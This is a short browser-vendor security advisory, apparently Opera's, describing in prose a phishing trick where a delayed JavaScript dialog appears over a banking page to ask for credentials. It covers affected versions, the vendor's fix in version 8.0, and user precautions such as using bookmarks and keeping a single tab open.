Search the knowledgebase


Advisory: Phishing attack possible with a delayed JavaScript prompt

Severity: Moderate/low

Problem description

A malicious page can be crafted to send the user to his banking site, and shortly afterwards display a dialog enticing the user to type in his bank login credentials.

The dialog will appear in front of the banking page, while the window it really belongs to will be hidden. If the timing and context is right, the message displayed in the dialog may be able to deceive the user.

For example, the user goes to his banking site from a Web page that happened to have a link to that bank. If he got the link to that page through e-mail, it could easily have come from a scammer.

Vulnerable versions of Opera

Any version that supports JavaScript. Tested on 6.1, 7.0 and 7.54.

Opera's response

Opera Software has made a fix that prevents this trick. The fix is available in the 8.0 version of Opera, which is due later this year. A beta version of Opera 8.0 with the fix is available for download.

We will not make a bugfix release for this.

There are other avenues of attack that can do better imitations and deceptions than this particular approach. Educating the users is the best we can do.

Safety precaution

We advise users to always access their online banks and vendors by way of bookmarks they have made themselves, or by typing the address into the address field. Never follow a link to a trusted site from a site that you do not fully trust. This rule applies to any site where you would enter sensitive information, such as your credit card number.

Extra precaution

If you only have one page ("tab") open in Opera, this attack will not work. This precaution will guard you against several potential JavaScript tricks.

Credits

Thanks to Jakob Balle at Secunia for demonstrating how delayed popups can be used for deception.

<http://secunia.com/advisories/12713/>

Browse through articles in the same categories: advisory